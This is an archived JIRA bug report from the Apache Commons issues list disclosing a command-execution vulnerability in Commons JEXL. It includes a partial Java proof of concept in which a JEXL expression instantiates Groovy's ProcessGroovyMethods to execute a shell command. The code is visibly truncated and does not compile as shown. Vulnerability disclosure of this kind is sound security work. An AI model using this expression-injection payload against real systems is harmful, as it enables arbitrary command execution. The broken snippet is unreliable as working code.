commons-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "cnbird (JIRA)" <>
Subject [jira] [Created] (JEXL-223) Apache Commons JEXL Expression Execute Command Vulnerabilitity
Date Fri, 21 Apr 2017 07:36:04 GMT
cnbird created JEXL-223:

             Summary: Apache Commons JEXL Expression Execute Command Vulnerabilitity
                 Key: JEXL-223
             Project: Commons JEXL
          Issue Type: Bug
            Reporter: cnbird
            Priority: Critical

0x01 Summary
Apache Commons JEXL Expression Execute Command Vulnerabilitity throught groovy.

0x02 POC
import java.util.List;

import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlExpression;
import org.apache.commons.jexl3.MapContext;
import org.codehaus.groovy.runtime.ProcessGroovyMethods;

public class elExp {
	public static void main(String args[]) throws IOException {
		// Create or retrieve an engine
	    JexlEngine jexl = new JexlBuilder().create();
	    // Create an expression
	    //String jexlExp = "new(\"java.lang.String\", \"hello wolrd\")";
	    ProcessGroovyMethods n = new ProcessGroovyMethods();
	    String jexlExp = "new(\"org.codehaus.groovy.runtime.ProcessGroovyMethods\").execute(\"touch
	    JexlExpression e = jexl.createExpression( jexlExp );
	    try {
			Process process = new ProcessBuilder("id").start();
		} catch (IOException e1) {
			// TODO Auto-generated catch block
	    // Create a context and add data
	    JexlContext jc = new MapContext();
	    jc.set("foo", jexlExp );
	    // Now evaluate the expression, getting the result
	    Object o = e.evaluate(jc);	

This message was sent by Atlassian JIRA

View raw message